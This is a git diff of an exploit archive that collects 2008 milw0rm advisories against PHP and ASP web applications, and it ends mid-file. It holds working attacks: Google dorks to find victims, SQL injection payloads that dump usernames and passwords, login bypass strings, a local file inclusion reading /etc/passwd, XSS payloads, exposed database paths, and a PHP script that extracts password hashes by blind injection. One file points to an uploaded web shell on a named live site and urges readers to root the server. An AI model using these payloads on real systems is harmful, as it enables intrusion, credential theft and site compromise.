@@ -1,50 +1,50 @@ -Author: otmorozok428, http://forum.antichat.ru - -Products: CMS Ortus 1.12, CMS Ortus 1.13 - -Vendor: http://ortus.nirn.ru - -Download: http://ortus.nirn.ru/files/ortus1-12.zip, http://ortus.nirn.ru/files/ortus1-13.zip - -Dork (for ALL Versions of CMS Ortus): inurl:index.php?ortupg= - - - -SQL Injection Vulnerability in POST Form: - -http://www.site.com/index.php?mod=users_edit_pub - -"City" field: [SQL Injection] - - - -EXAMPLE: - -1. You need to register first - - http://www.site.com/index.php?mod=users_add - -2. Authentication - - http://www.site.com/index.php?mod=auth - -3. Edit user profile next - - http://www.site.com/index.php?mod=users_edit_pub - -4. Exploit "City" field (receive admin rights) - - MyCity', `group`='admin - -5. Login to admin area - - http://www.site.com/auth.php - - - - -You can see demo video here: - -http://depositfiles.com/files/h8sbwikey - -# milw0rm.com [2008-11-26] +Author: otmorozok428, http://forum.antichat.ru + +Products: CMS Ortus 1.12, CMS Ortus 1.13 + +Vendor: http://ortus.nirn.ru + +Download: http://ortus.nirn.ru/files/ortus1-12.zip, http://ortus.nirn.ru/files/ortus1-13.zip + +Dork (for ALL Versions of CMS Ortus): inurl:index.php?ortupg= + + + +SQL Injection Vulnerability in POST Form: + +http://www.site.com/index.php?mod=users_edit_pub + +"City" field: [SQL Injection] + + + +EXAMPLE: + +1. You need to register first + + http://www.site.com/index.php?mod=users_add + +2. Authentication + + http://www.site.com/index.php?mod=auth + +3. Edit user profile next + + http://www.site.com/index.php?mod=users_edit_pub + +4. Exploit "City" field (receive admin rights) + + MyCity', `group`='admin + +5. Login to admin area + + http://www.site.com/auth.php + + + + +You can see demo video here: + +http://depositfiles.com/files/h8sbwikey + +# milw0rm.com [2008-11-26] diff --git a/platforms/php/webapps/7238.txt b/platforms/php/webapps/7238.txt index 346dab35a..316584225 100755 --- a/platforms/php/webapps/7238.txt 
+++ b/platforms/php/webapps/7238.txt 
@@ -1,36 +1,36 @@ -[â– ] Post Affiliate Pro v.3 (index.php md) <= Blind $ql Injection - - ->©< - -> AuToR: XaDoS -> Contact M&: xados [at] hotmail [dot] it -> B§g: Blind $ql inJection -> SIte vuln: http://www.qualityunit.com/postaffiliatepro/ - ->©< - - -[â– ] ExPL0iT: - -|: http://www.example.com/postaffiliatepro3/merchants/index.php?md=Affiliate_Merchants_Views_AffiliateManager&fromprofile=1&umprof_status=[sql] - - [you must be merchants] - -[â– ] D£M0: - -|: http://www.demo.qualityunit.com/postaffiliatepro3/merchants/index.php?md=Affiliate_Merchants_Views_AffiliateManager&fromprofile=1&umprof_status=1 and substring(@@version,1,1)=5 [NO°°] - -|: http://www.demo.qualityunit.com/postaffiliatepro3/merchants/index.php?md=Affiliate_Merchants_Views_AffiliateManager&fromprofile=1&umprof_status=1 and substring(@@version,1,1)=5 [y&$ ;-)] - - - -[â– ] Th4nKs:: - -\> Str0ke </ -\> Joy Division </ -\> Teo Babbeo </ -\> Spud </ -\> Loooo Z00ooo00oo0 </ Lol ;-) - -# milw0rm.com [2008-11-26] +[â– ] Post Affiliate Pro v.3 (index.php md) <= Blind $ql Injection + + +>©< + +> AuToR: XaDoS +> Contact M&: xados [at] hotmail [dot] it +> B§g: Blind $ql inJection +> SIte vuln: http://www.qualityunit.com/postaffiliatepro/ + +>©< + + +[â– ] ExPL0iT: + +|: http://www.example.com/postaffiliatepro3/merchants/index.php?md=Affiliate_Merchants_Views_AffiliateManager&fromprofile=1&umprof_status=[sql] + + [you must be merchants] + +[â– ] D£M0: + +|: http://www.demo.qualityunit.com/postaffiliatepro3/merchants/index.php?md=Affiliate_Merchants_Views_AffiliateManager&fromprofile=1&umprof_status=1 and substring(@@version,1,1)=5 [NO°°] + +|: http://www.demo.qualityunit.com/postaffiliatepro3/merchants/index.php?md=Affiliate_Merchants_Views_AffiliateManager&fromprofile=1&umprof_status=1 and substring(@@version,1,1)=5 [y&$ ;-)] + + + +[â– ] Th4nKs:: + +\> Str0ke </ +\> Joy Division </ +\> Teo Babbeo </ +\> Spud </ +\> Loooo Z00ooo00oo0 </ Lol ;-) + +# milw0rm.com [2008-11-26] 
diff --git a/platforms/php/webapps/7239.txt b/platforms/php/webapps/7239.txt
index 1df9e9054..fe21a8a32 100755
--- a/platforms/php/webapps/7239.txt
+++ b/platforms/php/webapps/7239.txt
@@ -1,33 +1,33 @@ --------------------------------------------------------------------------------------------------------------------- - -[~] Script : ParsBlogger - -[~] Version : >!< - -[~] Link : http://www.parsblogger.com - -[~] Dork : "Powered by ParsBlogger" - -[~] Author : BorN To K!LL - -[~] TeaM : Security Geeks [ Sec-Geeks.com ] - --------------------------------------------------------------------------------------------------------------------- - -[~] Exploit :. - -site.ir/blog.asp?wr=[SQL] - -[~] Example :. - -site.ir/blog.asp?wr=-5+union+all+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13+from+writer-- - --------------------------------------------------------------------------------------------------------------------- - -[~] Greetings :. - -[ Đr ĦλCКΣΓ ] , [ SECURITY GΣΣKS ] , [ AsbMay's Group ] , [ w4ck1ng TeaM ] , [ darkc0de TeaM ] , [ Juba ] .. n all muslims - --------------------------------------------------------------------------------------------------------------------- - -# milw0rm.com [2008-11-26] +-------------------------------------------------------------------------------------------------------------------- + +[~] Script : ParsBlogger + +[~] Version : >!< + +[~] Link : http://www.parsblogger.com + +[~] Dork : "Powered by ParsBlogger" + +[~] Author : BorN To K!LL + +[~] TeaM : Security Geeks [ Sec-Geeks.com ] + +-------------------------------------------------------------------------------------------------------------------- + +[~] Exploit :. + +site.ir/blog.asp?wr=[SQL] + +[~] Example :. + +site.ir/blog.asp?wr=-5+union+all+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13+from+writer-- + +-------------------------------------------------------------------------------------------------------------------- + +[~] Greetings :. + +[ Đr ĦλCКΣΓ ] , [ SECURITY GΣΣKS ] , [ AsbMay's Group ] , [ w4ck1ng TeaM ] , [ darkc0de TeaM ] , [ Juba ] .. 
n all muslims + +-------------------------------------------------------------------------------------------------------------------- + +# milw0rm.com [2008-11-26] diff --git a/platforms/php/webapps/7240.txt b/platforms/php/webapps/7240.txt index b4f49beb0..d5c747f01 100755 --- a/platforms/php/webapps/7240.txt +++ b/platforms/php/webapps/7240.txt 
@@ -1,68 +1,68 @@ - ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ - + + - + stararticles blind sql injection Vulnerability + - + + - + Discovered by b3hz4d + - + + - + WwW.DeltaHacking.Net + - + + - + + - + + - ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ - - - APA Center of Yazd University - (https://www.ircert.cc) - - -AUTHOR : b3hz4d (Seyed Behzad Shaghasemi) -DATE : 26 nov 2008 -SITE : WwW.DeltaHacking.Net -CONTACT: behzad_sh_66@yahoo.com - -##################################################### - -APPLICATION : stararticles -DOWNLOAD(175$): http://cmsnx.com/psf/order.php?id=5 -VENDOR : http://www.stararticles.com/ -DEMO : http://www.kalptarudemos.com/demo/stararticle/ -DORK : inurl:"article.download.php" - -##################################################### - - -[+] vuln : blind sql injection - - many of pages are vulnerable to blind sql injection: - - ./article.list.php - - ./article.print.php - - ./article.comments.php - - ./article.publisher.php - - . - . - . 
- -[+] Exploit : - true: - - http://www.kalptarudemos.com/demo/stararticle/article.download.php/1090%20and%20substring(@@version,1,1)=5 - http://www.bigarticle.com/article.download.php?artid=36106%20and%20substring(@@version,1,1)=5 - - false: - - http://www.kalptarudemos.com/demo/stararticle/article.download.php/1090%20and%20substring(@@version,1,1)=4 - http://www.bigarticle.com/article.download.php?artid=36106%20and%20substring(@@version,1,1)=4 - - -########################################################################################################## - -# Greetings: str0ke, Dr.Trojan, Cru3l.b0y, l0pht and all member in DeltaHacking.Net & Snoop-Security.Com # - -########################################################################################################## - -# milw0rm.com [2008-11-26] + ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ + + + + + stararticles blind sql injection Vulnerability + + + + + + Discovered by b3hz4d + + + + + + WwW.DeltaHacking.Net + + + + + + + + + + + ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ + + + APA Center of Yazd University + (https://www.ircert.cc) + + +AUTHOR : b3hz4d (Seyed Behzad Shaghasemi) +DATE : 26 nov 2008 +SITE : WwW.DeltaHacking.Net +CONTACT: behzad_sh_66@yahoo.com + +##################################################### + +APPLICATION : stararticles +DOWNLOAD(175$): http://cmsnx.com/psf/order.php?id=5 +VENDOR : http://www.stararticles.com/ +DEMO : http://www.kalptarudemos.com/demo/stararticle/ +DORK : inurl:"article.download.php" + +##################################################### + + +[+] vuln : blind sql injection + + many of pages are vulnerable to blind sql injection: + + ./article.list.php + + ./article.print.php + + ./article.comments.php + + ./article.publisher.php + + . + . + . 
+ +[+] Exploit : + true: + + http://www.kalptarudemos.com/demo/stararticle/article.download.php/1090%20and%20substring(@@version,1,1)=5 + http://www.bigarticle.com/article.download.php?artid=36106%20and%20substring(@@version,1,1)=5 + + false: + + http://www.kalptarudemos.com/demo/stararticle/article.download.php/1090%20and%20substring(@@version,1,1)=4 + http://www.bigarticle.com/article.download.php?artid=36106%20and%20substring(@@version,1,1)=4 + + +########################################################################################################## + +# Greetings: str0ke, Dr.Trojan, Cru3l.b0y, l0pht and all member in DeltaHacking.Net & Snoop-Security.Com # + +########################################################################################################## + +# milw0rm.com [2008-11-26] diff --git a/platforms/php/webapps/7241.txt b/platforms/php/webapps/7241.txt index 84467801b..7119da643 100755 --- a/platforms/php/webapps/7241.txt +++ b/platforms/php/webapps/7241.txt 
@@ -1,70 +1,70 @@ -============================================================ - TxtBlog (index.php m) Local File Inclusion Vulnerability -============================================================ - - ,--^----------,--------,-----,-------^--, - | ||||||||| `--------' | O .. CWH Underground Hacking Team .. - `+---------------------------^----------| - `\_,-------, _________________________| - / XXXXXX /`| / - / XXXXXX / `\ / - / XXXXXX /\______( - / XXXXXX / - / XXXXXX / - (________( - `------' - - -AUTHOR : CWH Underground -DATE : 27 November 2008 -SITE : cwh.citec.us - - -##################################################### - APPLICATION : TxtBlog - VERSION : v.1.0 Alpha - DOWNLOAD : http://downloads.sourceforge.net/txtblogcms/txtblogcms-1.0a.zip -##################################################### - ---- Local File Inclusion --- - ------------------------------ - Vulnerable File (index.php) ------------------------------ - -function showMonth() { - global $config_date_format, $txtblog_body, $txtblog_title, $config_title; - - $txtblog_body = ""; - $txtblog_title = "$config_title - Archives"; - - $year = $_GET['y']; - $month = $_GET['m']; - - $files = findFiles("data/$year/$month"); <<< BUG !!!! - - if (isset($files)) { - foreach ($files as $file) { - - include ("data/$year/$month/$file"); <<< BUG !!!! 
- $date_array = explode(" ",$date); - $date = date($config_date_format, mktime($date_array[0], $date_array[1], $date_array[2], $date_array[3], $date_array[4], $date_array[5])); - $txtblog_body .= "<span class='blog_title'>$title</span><br>\n<span class='blog_date'>$date</span><br>\n".bb2html($blog)."<br>\n<hr size='1'>\n"; - - } - } -} - ---------- - Exploit ---------- - -[+] http://[Target]/[txtblogcms_path]/index.php?y=2005&m=01/../../../../../../../../etc/passwd%00 - - -####################################################################################### -Greetz : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK -Special Thx : asylu3, str0ke, citec.us, milw0rm.com -####################################################################################### - -# milw0rm.com [2008-11-27] +============================================================ + TxtBlog (index.php m) Local File Inclusion Vulnerability +============================================================ + + ,--^----------,--------,-----,-------^--, + | ||||||||| `--------' | O .. CWH Underground Hacking Team .. 
+ `+---------------------------^----------| + `\_,-------, _________________________| + / XXXXXX /`| / + / XXXXXX / `\ / + / XXXXXX /\______( + / XXXXXX / + / XXXXXX / + (________( + `------' + + +AUTHOR : CWH Underground +DATE : 27 November 2008 +SITE : cwh.citec.us + + +##################################################### + APPLICATION : TxtBlog + VERSION : v.1.0 Alpha + DOWNLOAD : http://downloads.sourceforge.net/txtblogcms/txtblogcms-1.0a.zip +##################################################### + +--- Local File Inclusion --- + +----------------------------- + Vulnerable File (index.php) +----------------------------- + +function showMonth() { + global $config_date_format, $txtblog_body, $txtblog_title, $config_title; + + $txtblog_body = ""; + $txtblog_title = "$config_title - Archives"; + + $year = $_GET['y']; + $month = $_GET['m']; + + $files = findFiles("data/$year/$month"); <<< BUG !!!! + + if (isset($files)) { + foreach ($files as $file) { + + include ("data/$year/$month/$file"); <<< BUG !!!! + $date_array = explode(" ",$date); + $date = date($config_date_format, mktime($date_array[0], $date_array[1], $date_array[2], $date_array[3], $date_array[4], $date_array[5])); + $txtblog_body .= "<span class='blog_title'>$title</span><br>\n<span class='blog_date'>$date</span><br>\n".bb2html($blog)."<br>\n<hr size='1'>\n"; + + } + } +} + +--------- + Exploit +--------- + +[+] http://[Target]/[txtblogcms_path]/index.php?y=2005&m=01/../../../../../../../../etc/passwd%00 + + +####################################################################################### +Greetz : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK +Special Thx : asylu3, str0ke, citec.us, milw0rm.com +####################################################################################### + +# milw0rm.com [2008-11-27] diff --git a/platforms/php/webapps/7242.txt b/platforms/php/webapps/7242.txt index 0a20e2eec..075c2bb1f 100755 --- a/platforms/php/webapps/7242.txt 
+++ b/platforms/php/webapps/7242.txt 
@@ -1,39 +1,39 @@ -000000 00000 0000 0000 000 00 000000 0000000 0000 000000 00000 - 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 - 0 0 0 0 00 0 0 0 0 0 0 0 0 00 0 0 0 0 0 - 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 - 00000 0 0 0 0 0 0 0 0 00000 0000 0 0 0 0 00000 0 0 - 0 0 0 0 0 0 0 0 000 0 0 0 0 0 0 0 0 0 0 0 0 - 0 0 0 0 000 0 0 0 0 0 0 0 000 0 0 0 0 - 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 -000000 0000000 000 0000 000 00 000000 0000000 000 000 00 00000 - - - -[+] Script : Web Calendar System v 3.12/3.30 - -[+] Exploit Type : Multiple Exploits (XSS + remote bypass Exploit) - -[+] Google Dork : intitle:Web Calendar system v 3.30 inurl:.asp -[+] Google Dork : intitle:Web Calendar system v 3.12 inurl:.asp - -[+] Contact : blackbeard-sql@hotmail.fr - - ---//--> Exploit : - -1) Remote Bypass Exploit : - -http://[website]/[script]/db/agenda/calendar.asp?DoAction=USER&Change=LOGINFORM - -username:' or '1'='1 - -password:' or '1'='1 - -2) Remote XSS exploit : - -In simple words : - -http://[website]/[script]/CALENDAR.ASP?DoAction=Calendar&View=Search&SText=<script>alert('Bl@ckbe@rD is not dead yet')</script>[Peace xD ] - -# milw0rm.com [2008-11-27] +000000 00000 0000 0000 000 00 000000 0000000 0000 000000 00000 + 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 + 0 0 0 0 00 0 0 0 0 0 0 0 0 00 0 0 0 0 0 + 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 + 00000 0 0 0 0 0 0 0 0 00000 0000 0 0 0 0 00000 0 0 + 0 0 0 0 0 0 0 0 000 0 0 0 0 0 0 0 0 0 0 0 0 + 0 0 0 0 000 0 0 0 0 0 0 0 000 0 0 0 0 + 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 +000000 0000000 000 0000 000 00 000000 0000000 000 000 00 00000 + + + +[+] Script : Web Calendar System v 3.12/3.30 + +[+] Exploit Type : Multiple Exploits (XSS + remote bypass Exploit) + +[+] Google Dork : intitle:Web Calendar system v 3.30 inurl:.asp +[+] Google Dork : intitle:Web Calendar system v 3.12 inurl:.asp + +[+] Contact : blackbeard-sql@hotmail.fr + + +--//--> Exploit : + +1) Remote Bypass Exploit : + 
+http://[website]/[script]/db/agenda/calendar.asp?DoAction=USER&Change=LOGINFORM + +username:' or '1'='1 + +password:' or '1'='1 + +2) Remote XSS exploit : + +In simple words : + +http://[website]/[script]/CALENDAR.ASP?DoAction=Calendar&View=Search&SText=<script>alert('Bl@ckbe@rD is not dead yet')</script>[Peace xD ] + +# milw0rm.com [2008-11-27] diff --git a/platforms/php/webapps/7243.php b/platforms/php/webapps/7243.php index 8da70dd27..315b2fe2b 100755 --- a/platforms/php/webapps/7243.php +++ b/platforms/php/webapps/7243.php 
@@ -1,60 +1,60 @@ -<?php - /* ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ - + + - + stararticles blind sql injection Vulnerability xpl + - ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ -AUTHOR : Mountassif Moad -DATE : 26 nov 2008 -##################################################### -APPLICATION : stararticles -DOWNLOAD(175$): http://cmsnx.com/psf/order.php?id=5 -VENDOR : http://www.stararticles.com/ -DEMO : http://www.kalptarudemos.com/demo/stararticle/ -DORK : inurl:"article.download.php" -##################################################### - */ - -# -ini_set("max_execution_time",0); -print_r(' -############################################################### -# stararticles Blind SQL Injection Exploit -#php '.$argv[0].' "http://www.site.com/article.download.php?artid=36106" 1 -# -############################################################### -'); -if ($argc > 1) { -$url = $argv[1]; -if ($argc < 3) { -$userid = 1; -} else { -$userid = $argv[2]; -} -$r = strlen(file_get_contents($url."+and+1=1")); -echo "\nExploiting:\n"; -$w = strlen(file_get_contents($url."+and+1=0")); -$t = abs((100-($w/$r*100))); -echo "\nPassword: "; -for ($j = 1; $j <= 32; $j++) { - for ($i = 46; $i <= 102; $i=$i+2) { - if ($i == 60) { - $i = 98; - } - $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+myart_users+where+id=".$userid."+limit+0,1),".$j.",1))%3E".$i."")); - if (abs((100-($laenge/$r*100))) > $t-1) { - $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+myart_users+where+id=".$userid."+limit+0,1),".$j.",1))%3E".($i-1)."")); - if (abs((100-($laenge/$r*100))) > $t-1) { - echo chr($i-1); - } else { - echo chr($i); - } - $i = 102; - } - } -} -} else { -echo "\nExploiting failed: By Stack\n"; -} -?> - -# milw0rm.com [2008-11-27] +<?php + /* ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ + + + + + stararticles blind sql injection Vulnerability 
xpl + + ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +AUTHOR : Mountassif Moad +DATE : 26 nov 2008 +##################################################### +APPLICATION : stararticles +DOWNLOAD(175$): http://cmsnx.com/psf/order.php?id=5 +VENDOR : http://www.stararticles.com/ +DEMO : http://www.kalptarudemos.com/demo/stararticle/ +DORK : inurl:"article.download.php" +##################################################### + */ + +# +ini_set("max_execution_time",0); +print_r(' +############################################################### +# stararticles Blind SQL Injection Exploit +#php '.$argv[0].' "http://www.site.com/article.download.php?artid=36106" 1 +# +############################################################### +'); +if ($argc > 1) { +$url = $argv[1]; +if ($argc < 3) { +$userid = 1; +} else { +$userid = $argv[2]; +} +$r = strlen(file_get_contents($url."+and+1=1")); +echo "\nExploiting:\n"; +$w = strlen(file_get_contents($url."+and+1=0")); +$t = abs((100-($w/$r*100))); +echo "\nPassword: "; +for ($j = 1; $j <= 32; $j++) { + for ($i = 46; $i <= 102; $i=$i+2) { + if ($i == 60) { + $i = 98; + } + $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+myart_users+where+id=".$userid."+limit+0,1),".$j.",1))%3E".$i."")); + if (abs((100-($laenge/$r*100))) > $t-1) { + $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+myart_users+where+id=".$userid."+limit+0,1),".$j.",1))%3E".($i-1)."")); + if (abs((100-($laenge/$r*100))) > $t-1) { + echo chr($i-1); + } else { + echo chr($i); + } + $i = 102; + } + } +} +} else { +echo "\nExploiting failed: By Stack\n"; +} +?> + +# milw0rm.com [2008-11-27] diff --git a/platforms/php/webapps/7244.txt b/platforms/php/webapps/7244.txt index d3e7a58e0..be1745de4 100755 --- a/platforms/php/webapps/7244.txt +++ b/platforms/php/webapps/7244.txt 
@@ -1,23 +1,23 @@ -######################################################### ---------------------------------------------------------- -Portal Name: Ocean12 Contact Manager Pro -Version : 1.02 -Vendor : http://ocean12tech.com/products/contact -Dork: Maintained with the Ocean12 Contact Manager Pro v1.02 -Author : Pouya_Server , Pouya.s3rver@Gmail.com -Vulnerability : (DDV,XSS,SQL) ---------------------------------------------------------- -######################################################### -[SQL]: -http://site.com/path/default.asp?DisplayFormat=Card&Sort=[SQL] - -[Database Disclosure Vulnerability]: -http://site.com/path/o12con.mdb - -[XSS]: -http://site.com/path/?DisplayFormat=>"><ScRiPt>alert(1369)%3B</ScRiPt>&Action=Pouya_Server ---------------------------------- -Victem : -http://ocean12tech.com/products/contact/demo - -# milw0rm.com [2008-11-27] +######################################################### +--------------------------------------------------------- +Portal Name: Ocean12 Contact Manager Pro +Version : 1.02 +Vendor : http://ocean12tech.com/products/contact +Dork: Maintained with the Ocean12 Contact Manager Pro v1.02 +Author : Pouya_Server , Pouya.s3rver@Gmail.com +Vulnerability : (DDV,XSS,SQL) +--------------------------------------------------------- +######################################################### +[SQL]: +http://site.com/path/default.asp?DisplayFormat=Card&Sort=[SQL] + +[Database Disclosure Vulnerability]: +http://site.com/path/o12con.mdb + +[XSS]: +http://site.com/path/?DisplayFormat=>"><ScRiPt>alert(1369)%3B</ScRiPt>&Action=Pouya_Server +--------------------------------- +Victem : +http://ocean12tech.com/products/contact/demo + +# milw0rm.com [2008-11-27] diff --git a/platforms/php/webapps/7245.txt b/platforms/php/webapps/7245.txt index 349600fe9..2d9d97bc5 100755 --- a/platforms/php/webapps/7245.txt +++ b/platforms/php/webapps/7245.txt 
@@ -1,15 +1,15 @@ -######################################################### ---------------------------------------------------------- -Portal Name: Ocean12 Membership Manager Pro -Vendor : http://ocean12tech.com/products/membership -Dork: ©2005 Ocean12 Technologies. All rights reserved -Author : Pouya_Server , Pouya.s3rver@Gmail.com -Vulnerability : Database Disclosure Vulnerability ---------------------------------------------------------- -######################################################### -http://ocean12tech.com/path/o12member.mdb ---------------------------------- -Victem : -http://ocean12tech.com/products/membership/demo - -# milw0rm.com [2008-11-27] +######################################################### +--------------------------------------------------------- +Portal Name: Ocean12 Membership Manager Pro +Vendor : http://ocean12tech.com/products/membership +Dork: ©2005 Ocean12 Technologies. All rights reserved +Author : Pouya_Server , Pouya.s3rver@Gmail.com +Vulnerability : Database Disclosure Vulnerability +--------------------------------------------------------- +######################################################### +http://ocean12tech.com/path/o12member.mdb +--------------------------------- +Victem : +http://ocean12tech.com/products/membership/demo + +# milw0rm.com [2008-11-27] diff --git a/platforms/php/webapps/7246.txt b/platforms/php/webapps/7246.txt index 7cf0c4b2b..5adaef87d 100755 --- a/platforms/php/webapps/7246.txt +++ b/platforms/php/webapps/7246.txt 
@@ -1,17 +1,17 @@ -######################################################### ---------------------------------------------------------- -Portal Name: Ocean12 Poll Manager Pro -Version: 1.00 -Vendor : http://ocean12tech.com/products/poll -Dork: Maintained with the Ocean12 Poll Manager Pro v1.00 -Author : Pouya_Server , Pouya.s3rver@Gmail.com -Vulnerability : Database Disclosure Vulnerability ---------------------------------------------------------- -######################################################### -http://site.com/path/o12poll.mdb - ---------------------------------- -Victem : -http://ocean12tech.com/products/poll/demo - -# milw0rm.com [2008-11-27] +######################################################### +--------------------------------------------------------- +Portal Name: Ocean12 Poll Manager Pro +Version: 1.00 +Vendor : http://ocean12tech.com/products/poll +Dork: Maintained with the Ocean12 Poll Manager Pro v1.00 +Author : Pouya_Server , Pouya.s3rver@Gmail.com +Vulnerability : Database Disclosure Vulnerability +--------------------------------------------------------- +######################################################### +http://site.com/path/o12poll.mdb + +--------------------------------- +Victem : +http://ocean12tech.com/products/poll/demo + +# milw0rm.com [2008-11-27] diff --git a/platforms/php/webapps/7247.txt b/platforms/php/webapps/7247.txt index bfdd6a14d..f8a7c5c8f 100755 --- a/platforms/php/webapps/7247.txt +++ b/platforms/php/webapps/7247.txt 
@@ -1,17 +1,17 @@ -######################################################### ---------------------------------------------------------- -Portal Name: Ocean12 Calendar Manager Gold -Version: 2.04 -Vendor : http://ocean12tech.com/products/o12calgold -Dork: Maintained with the Ocean12 Calendar Manager Gold v2.04 -Author : Pouya_Server , Pouya.s3rver@Gmail.com -Vulnerability : Database Disclosure Vulnerability ---------------------------------------------------------- -######################################################### -http://site.com/path/o12cal.mdb - ---------------------------------- -Victem : -http://ocean12tech.com/products/o12calgold/demo - -# milw0rm.com [2008-11-27] +######################################################### +--------------------------------------------------------- +Portal Name: Ocean12 Calendar Manager Gold +Version: 2.04 +Vendor : http://ocean12tech.com/products/o12calgold +Dork: Maintained with the Ocean12 Calendar Manager Gold v2.04 +Author : Pouya_Server , Pouya.s3rver@Gmail.com +Vulnerability : Database Disclosure Vulnerability +--------------------------------------------------------- +######################################################### +http://site.com/path/o12cal.mdb + +--------------------------------- +Victem : +http://ocean12tech.com/products/o12calgold/demo + +# milw0rm.com [2008-11-27] diff --git a/platforms/php/webapps/7248.txt b/platforms/php/webapps/7248.txt index 169e33f85..4d4cad88d 100755 --- a/platforms/php/webapps/7248.txt +++ b/platforms/php/webapps/7248.txt 
@@ -1,26 +1,26 @@ ---------------------------------------Mor0ccan nightamres--------------------------------------------- -Script : familyproject - -V3rs!0n : 2.0 - -Download : http://www.mjcreation.fr/familyproject/ - -Auth0r : The_5p3ctrum ------------------------------------------------------------------------------------ - -demo Exploit : - -http://www.mjcreation.fr/familyproject/demo/index.php - -login : ' or 1=1 or 'r -pass : ' or 1=1 or 'r - ------------------------------------------------------------------------------------ - -Greets : - -str0ke , Bayhay , Cyber-Zone , Mor0ccan nightamres - ------------------------------------------------------------------------------------ - -# milw0rm.com [2008-11-27] +--------------------------------------Mor0ccan nightamres--------------------------------------------- +Script : familyproject + +V3rs!0n : 2.0 + +Download : http://www.mjcreation.fr/familyproject/ + +Auth0r : The_5p3ctrum +----------------------------------------------------------------------------------- + +demo Exploit : + +http://www.mjcreation.fr/familyproject/demo/index.php + +login : ' or 1=1 or 'r +pass : ' or 1=1 or 'r + +----------------------------------------------------------------------------------- + +Greets : + +str0ke , Bayhay , Cyber-Zone , Mor0ccan nightamres + +----------------------------------------------------------------------------------- + +# milw0rm.com [2008-11-27] diff --git a/platforms/php/webapps/725.pl b/platforms/php/webapps/725.pl index 6b7c9710b..d4f1c4dda 100755 --- a/platforms/php/webapps/725.pl +++ b/platforms/php/webapps/725.pl @@ -217,6 +217,6 @@ if ($hot[$q] =~/http/) $tipo=get($hot[$q]) or next; }} } -} - -# milw0rm.com [2004-12-25] +} + +# milw0rm.com [2004-12-25] diff --git a/platforms/php/webapps/7250.txt b/platforms/php/webapps/7250.txt index cf08868b6..6cb135da9 100755 --- a/platforms/php/webapps/7250.txt +++ b/platforms/php/webapps/7250.txt 
@@ -1,31 +1,31 @@ -[â– ] Prince Comparison Script : Shopping card <= Rem0tE $ql Injection - ->@.@< - -> AuToR: XaDoS -> Contact M&: xados [at] hotmail [dot] it -> B§g: Remote Sql inJection -> SIte vuln: http://willscript.com/rjbike_new/index.php - ->@.@< - - - -[â– ] ExPL0iT: - -|: http://www.example.com/product.php?category_id=1&subcategory_id=[$qL] - - - -[â– ] D£M0: - -|: http://willscript.com/rjbike_new/product.php?category_id=1&subcategory_id=4 union select 1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from admin-- - -(you see the username and password of adm in the title of one product) - -[â– ] Th4nKs:: - -\> str0ke </ -\> OnlY me ( no help for this ) ;-) </ - -# milw0rm.com [2008-11-27] +[â– ] Prince Comparison Script : Shopping card <= Rem0tE $ql Injection + +>@.@< + +> AuToR: XaDoS +> Contact M&: xados [at] hotmail [dot] it +> B§g: Remote Sql inJection +> SIte vuln: http://willscript.com/rjbike_new/index.php + +>@.@< + + + +[â– ] ExPL0iT: + +|: http://www.example.com/product.php?category_id=1&subcategory_id=[$qL] + + + +[â– ] D£M0: + +|: http://willscript.com/rjbike_new/product.php?category_id=1&subcategory_id=4 union select 1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from admin-- + +(you see the username and password of adm in the title of one product) + +[â– ] Th4nKs:: + +\> str0ke </ +\> OnlY me ( no help for this ) ;-) </ + +# milw0rm.com [2008-11-27] diff --git a/platforms/php/webapps/7251.txt b/platforms/php/webapps/7251.txt index 2cdb49590..c400b07b3 100755 --- a/platforms/php/webapps/7251.txt +++ b/platforms/php/webapps/7251.txt 
@@ -1,78 +1,78 @@ -[~] Star Articles 6.0 Remote File Upload -[~] -[~] ---------------------------------------------------------- -[~] Discovered By: ZoRLu msn: trt-turk@hotmail.com -[~] -[~] Home: www.z0rlu.blogspot.com -[~] -[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( ( -[~] -[~] dork: allinurl:"article.download.php" ( baya bi site var ) -[~] -[~] N0T: pls dont make demos ( demolarI hacklemeyin LUTFEN kucuk bir rica ) -[~] ----------------------------------------------------------- - -expl: - -http://script//authorphoto/user_name[id].php - -example: - -http://www.lcfarticles.com//authorphoto/zorlu40.php ( according to me you dont make hack this site ) - -http://www.lcfarticles.com//authorphoto/zorlu40.php?act=ls&d=%2Fetc%2Fvdomainaliases ( server fena deil ) - -hemen hacklemeyin arkadaslar serverý kurcalayIn bakIn misal: - -http://www.lcfarticles.com//authorphoto/zorlu40.php?act=ls&d=%2Fhome%2Fkiddybab%2Fpublic_html%2F - -bir cok site var. ya rootlayýn yada tek tek cakýn config okuyun vs. serverdaki sitelerle ugrasmadan zone kasIlmaz ;) - -http://www.lcfarticles.com//authorphoto/zorlu40.php?act=ls&d=%2Fhome%2Fkiddybab%2Fpublic_html%2F - -bu serverdaki bir site 